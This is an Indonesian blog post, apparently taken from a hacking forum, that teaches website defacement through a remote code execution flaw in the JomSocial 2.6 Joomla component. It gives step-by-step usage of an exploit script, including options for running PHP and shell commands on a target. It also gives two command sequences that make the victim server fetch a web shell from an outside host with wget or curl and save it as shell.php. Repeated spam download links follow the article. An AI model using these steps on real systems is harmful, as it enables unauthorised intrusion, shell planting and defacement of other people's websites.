Assalamualaikum Wr Wb..
Kesempatan kali ini saya membe trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :
JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.
Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode² berbahaya untuk mengeksploitasi web yg memakai komponen ini.
Bahan sebelum beraksi download bahannya :
>> Python 2.7
Step- step :
1. Install Python
2. Open cmd
3. Masuk dir dimana exploit berada
4. Jalankan exploit
Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi
Macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru
## Cara tanam shell
>> Trik A :
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"
>> Trik B:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"
Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya >> DISINI <<.
Trimakasih,
Thanks to : Sanjungan Jiwa
Content Editor : ./V404
Source : IDCA
Jomsocial 2.6 - Remote Code Execution - Bl4Ck Notes >>>>> Download Now
ReplyDelete>>>>> Download Full
Jomsocial 2.6 - Remote Code Execution - Bl4Ck Notes >>>>> Download LINK
>>>>> Download Now
Jomsocial 2.6 - Remote Code Execution - Bl4Ck Notes >>>>> Download Full
>>>>> Download LINK